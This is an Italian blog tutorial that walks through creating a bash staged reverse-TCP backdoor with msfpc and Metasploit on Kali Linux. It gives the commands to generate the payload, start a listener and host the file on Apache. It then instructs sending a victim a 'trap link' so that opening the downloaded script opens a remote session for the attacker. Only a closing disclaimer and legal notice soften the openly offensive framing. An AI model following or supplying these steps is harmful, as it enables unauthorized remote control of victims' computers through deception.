
Creare bash-shell-staged-reverse-tcp backdoor
Oggi andremo a parlare dei procedimenti per creare bash-shell-staged-reverse-tcp backdoor, di cui la creazione è abbastanza simile alla linux-shell-staged-bind-tcp backdoor, della quale ho parlato nel precedente articolo. Infatti lo scopo della backdoor che andremo ad analizzare oggi è sempre quello di evadere le misure di sicurezza di un sistema ed entrarvi, prendendo ampi poteri di comando della macchina remota. Come potete immaginare anche il programma per creare bash-shell-staged-reverse-tcp backdoor è uguale a quello che abbiamo adoperato per creare la backdoor che vi ho illustrato nel recente tutorial; stiamo parlando di Msfvenom Payload Creator, un tool incluso in Kali Linux che ci consente di dar vita a un gran numero di backdoor. Ma adesso vediamo i vari passaggi utili per creare la backdoor di cui stiamo parlando in questo articolo.
Per prima cosa andiamo su Applicazioni>Strumenti di exploiting>msf payload creator
Bene, una volta che si aprirà il terminale digitiamo il seguente comando:
/usr/bin/msfpc verbose loop “IP locale”
Noterete che nella sezione Home si andranno a creare una serie di file; di questi, per adesso, solo uno ci sarà utile; stiamo parlando del file “bash-shell-staged-reverse-tcp-443.sh”.
Ricordo che per trovare l’IP locale basterà aprire un nuovo terminale e digitare il comando “ifconfig”
Adesso sul terminale di msf payload creator possiamo digitare questo comando:
msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-443-sh.rc’
Dopo aver digitato questo comando si starterà la msfconsole di Metasploit Framework, che si metterà in ascolto.
Ora è il momento di trasferire il file “bash-shell-staged-reverse-tcp-443.sh” nel percorso “computer>var>www>html”.
A questo punto apriamo un nuovo terminale e digitiamo il comando “service apache2 start”
Siamo quasi giunti al termine dell’attacco; basterà inviare alla vittima un link con la seguente struttura: “nostro indirizzo IP”/bash-shell-staged-reverse-tcp-443.sh
Ovviamente al posto di “nostro indirizzo IP” andrete a inserire il vostro IP locale, che avete già ricavato in precedenza con il comando “ifconfig”.
Quando la vittima cliccherà sul link-trappola che le avrete inviato, si avvierà in automatico il download della backdoor sul suo computer e una volta che il file verrà aperto il terminale di Metasploit Framework aprirà una sessione con il PC della vittima.
Se non avete chiaro il quadro dei comandi potete sempre digitare il comando “help” sul terminale di Metasploit e vi verrà fornito un quadro completo di azioni che potete svolgere sul sistema remoto.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Leggi anche il nostro articolo Generare un link maligno con Kali Linux.
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI